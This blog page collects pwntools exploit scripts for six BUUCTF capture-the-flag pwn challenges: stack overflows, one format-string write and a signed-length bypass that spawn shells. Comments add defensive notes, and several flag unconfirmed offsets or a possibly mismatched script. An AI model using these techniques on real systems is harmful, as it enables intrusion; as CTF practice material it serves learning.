buuctf pwn 部分exp(无解析,持续更新)_0rangecat的博客-爱代码爱编程
wustctf2020_getshell2 exp
from pwn import *
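# Return-address overwrite against a 32-bit target (addresses are packed with
# p32). The hard-coded addresses only stay valid if the binary is loaded at a
# fixed base -- presumably it is built without PIE; confirm with checksec.
# Defensive takeaway: a length-bounded read, stack canaries and PIE/ASLR are
# the controls that stop this class of bug.
p = remote("node4.buuoj.cn", 27238)

# Going by the names: a `call system` site and the address of an "sh" string
# inside the challenge binary (not verifiable from this page).
call_system = 0x8048529
sh_addr = 0x08048670

# 28 filler bytes, then the word that lands on the saved return address, then
# the word that call site presumably reads as its argument.
# NOTE(review): 28 is presumably buffer size + saved frame pointer -- confirm
# against the binary. The named constant is used here (the original repeated
# the literal) so the address cannot drift from its definition.
payload = b'a' * 28 + p32(call_system) + p32(sh_addr)
p.sendline(payload)
p.interactive()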
wustctf2020_getshell exp
from pwn import *
# Return-address overwrite against a 32-bit target: filler up to the saved
# return address, then one packed code address.
# NOTE(review): what lives at RET_TARGET is not shown on this page; given the
# challenge name it is presumably a function that already spawns a shell.
# The fixed address presumably relies on a non-PIE build -- confirm.
RET_TARGET = 0x0804851B
FILLER_LEN = 28  # presumably buffer size + saved frame pointer -- TODO confirm

io = remote("node4.buuoj.cn", 27723)
io.sendline(b'a' * FILLER_LEN + p32(RET_TARGET))
io.interactive()
level0 exp
from pwn import *
# 64-bit return-address overwrite (the address is packed with p64).
# The filler is written as 128 + 8 bytes: presumably a 128-byte stack buffer
# followed by the 8-byte saved frame pointer -- confirm against the binary.
# Root cause on the target side is a read that accepts more bytes than the
# buffer holds; a bounded read or a stack canary would prevent the overwrite.
FILLER = b'a' * 128 + b'b' * 8
RET_TARGET = 0x00400596  # meaning not shown here; presumably a shell helper

io = remote("node4.buuoj.cn", 28051)
io.sendline(FILLER + p64(RET_TARGET))
io.interactive()
[第五空间2019 决赛]PWN5
from pwn import *
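p = remote("node4.buuoj.cn", 28342)

# Format-string write: fmtstr_payload builds input that stores `secret` at
# 0x804c044 when the target passes it to a printf-style call as the format
# argument. 10 is the argument offset at which the input appears on the stack.
# NOTE(review): 0x804c044 is presumably the value the password is compared
# against -- confirm against the binary. The target-side fix is to always
# print user input through a constant format string.
secret = 1111
payload = fmtstr_payload(10, {0x804c044: secret})

# Prompts and the reply are passed as bytes: pwntools tubes work on bytes and
# only accept str by assuming ASCII (with a BytesWarning). Keeping one
# `secret` value guarantees that the written and the submitted number match.
p.sendlineafter(b'your name:', payload)
p.sendlineafter(b'your passwd:', str(secret).encode())
p.interactive()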
bjdctf_2020_babystack exp
from pwn import *
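p = remote("node4.buuoj.cn", 28783)

# First line answers a numeric prompt with -1.
# NOTE(review): presumably the target checks the length as a signed value and
# then uses it as an unsigned size, so -1 lifts the read limit -- confirm.
# Sent as bytes: pwntools tubes work on bytes and only accept str by assuming
# ASCII (with a BytesWarning).
p.sendline(b'-1')

# 24 filler bytes, then a packed 64-bit address on the saved return address.
# presumably 24 = buffer size + saved frame pointer -- TODO confirm.
# Defensive takeaway: validate the length as unsigned and against the real
# buffer size before reading.
payload = b'a' * 24 + p64(0x4006E6)
p.sendline(payload)
p.interactive()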
ciscn_2019_n_1 exp
from pwn import *
# 32-bit return-address overwrite (the address is packed with p32).
# NOTE(review): only 24 bytes precede the address and 20 of them are 'I';
# presumably the target rewrites the input before copying it, so the copied
# length differs from the sent length -- confirm against the binary.
# NOTE(review): confirm this script belongs to the heading above it; a
# p32-packed address implies a 32-bit binary.
RET_TARGET = 0x08048F0D
FILLER = b'I' * 20 + b'A' * 4

io = remote("node4.buuoj.cn", 29026)
io.sendline(FILLER + p32(RET_TARGET))
io.interactive()